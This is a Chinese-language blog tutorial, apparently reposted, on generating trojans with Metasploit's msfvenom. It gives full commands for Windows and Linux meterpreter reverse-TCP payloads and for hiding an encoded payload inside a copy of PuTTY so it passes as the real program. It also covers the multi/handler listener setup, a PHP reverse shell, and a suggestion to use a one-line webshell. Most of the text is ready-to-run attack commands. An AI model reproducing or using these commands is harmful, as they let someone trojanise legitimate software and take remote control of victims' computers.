msfvenom的使用流程_MS软件安装「建议收藏」

msfvenom的使用流程_MS软件安装「建议收藏」msfvenom也只metasploit中的一个很强的工具,msfvenom生成木马非常的迅速可以各种版本的木马该工具由msfpaylod和msfencodes的组成生成木马是需要在本地监听,等待木马上线即可。该步骤在meterpretr的使用有使用到命令这里我们主要讲解msfvenom的命

大家好,欢迎来到IT知识分享网。

msfvenom也只metasploit中的一个很强的工具,msfvenom生成木马非常的迅速可以各种版本的木马
该工具由msfpaylodmsfencodes的组成
生成木马是需要在本地监听,等待木马上线即可。该步骤在meterpretr的使用有使用到

命令

这里我们主要讲解msfvenom的命令

命令 参数
-l 列出指定模块中payload的数量,payload.nops.all……
-p 指定使用的payload
-f 指定输出文件的格式,例如 exe、elf
-e 指定编码类型
-i 编码次数
-a 指定目标结构,例如x86、x64
-o 导出木马的位置
-b 木马中不能出现的字符
-x 将payload加入到的文件
-k 将payload加入到原文件的复制中

查找模块

msfvenom -l platforms查看支持的平台
msfvenom的使用流程_MS软件安装「建议收藏」
参数很长,可能记不清楚,那么我们只需要输入一个错误的模块,msfvenom会提示我们可以查看那些
msfvenom的使用流程_MS软件安装「建议收藏」
可以看到我们可以查询的模块
例如我们想要查找一个windows带有meterpreter控制台的,我们可以执行
msfvenom -l payloads|grep windows|grep meterpreter
msfvenom的使用流程_MS软件安装「建议收藏」
这里已经找到了相关的模块
msfvenom -l encoders,查看可用的编码模块
msfvenom的使用流程_MS软件安装「建议收藏」

生成一个windows木马

msfvenom -p windows/meterpreter/reverse_tcp LHOST=172.16.1.1 LPORT=1234 -f exe -o /root/shell.exe
msfvenom的使用流程_MS软件安装「建议收藏」

生成一个linux木马

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=172.16.1.1 LPORT=1234 -f elf -o /root/shell.elf
msfvenom的使用流程_MS软件安装「建议收藏」

将我们的木马加入到exe文件

这里由常用的远程连接工具putty为例
msfvenom -p windows/meterpreter/reverse_tcp LHOST=172.16.1.1 LPORT=1234 -x putty.exe -k -a x86 -e x86/shikata_ga_nai -i 2 -f exe -o super_putty.exe
注意:-a指定结构,x指定文件,-e指定编码方式,-i指定编码次数
msfvenom的使用流程_MS软件安装「建议收藏」
这里编码并没有成功导出文件,报错了,提示我们溢出,正常情况下是可以成功的
后续我换了一个putty的版本成功了
msfvenom -p windows/meterpreter/reverse_tcp LHOST=172.16.1.102 LPORT=1234 -x putty.exe -k -e ruby/base64 -i 1 -f exe -o S_putty.exe
于上次不同这次使用的是ruby/base64加密
msfvenom的使用流程_MS软件安装「建议收藏」
msfvenom的使用流程_MS软件安装「建议收藏」
将木马共享到windows电脑上指定putty,
在本机设置监听,在windows电脑上执行我们的木马,查看是否可以反弹shell

use exploit/multi\handler
set payload windows/meterpreter/reverse_tcp
set LHOST 172.16.1.102
set LPORT 1234
run

msfvenom的使用流程_MS软件安装「建议收藏」
这里我并没有反弹成功,在靶机执行程序崩溃了,出了些问题,但是我们的命令没有出问题,可以再换一个程序试一试
msfvenom的使用流程_MS软件安装「建议收藏」
之前测试是可以成功的

php反弹

查找phppayload
msfvenom的使用流程_MS软件安装「建议收藏」
msfvenom的使用流程_MS软件安装「建议收藏」
msfvenom -p php/meterpreter/reverse_tcp LHOST=172.16.1.102 LPORT=1234 -f raw > shell.php
这里反弹shell我是成功了,但是使用shell连接执行命令的时候总是断开,可能不支持吧,这里还是建议手写的一句话木马
msfvenom的使用流程_MS软件安装「建议收藏」
在linux中我尝试的时候,无法反弹shell

免责声明:本站所有文章内容,图片,视频等均是来源于用户投稿和互联网及文摘转载整编而成,不代表本站观点,不承担相关法律责任。其著作权各归其原作者或其出版社所有。如发现本站有涉嫌抄袭侵权/违法违规的内容,侵犯到您的权益,请在线联系站长,一经查实,本站将立刻删除。 本文来自网络,若有侵权,请联系删除,如若转载,请注明出处:https://yundeesoft.com/30026.html

(0)

相关推荐

发表回复

您的电子邮箱地址不会被公开。 必填项已用 * 标注

关注微信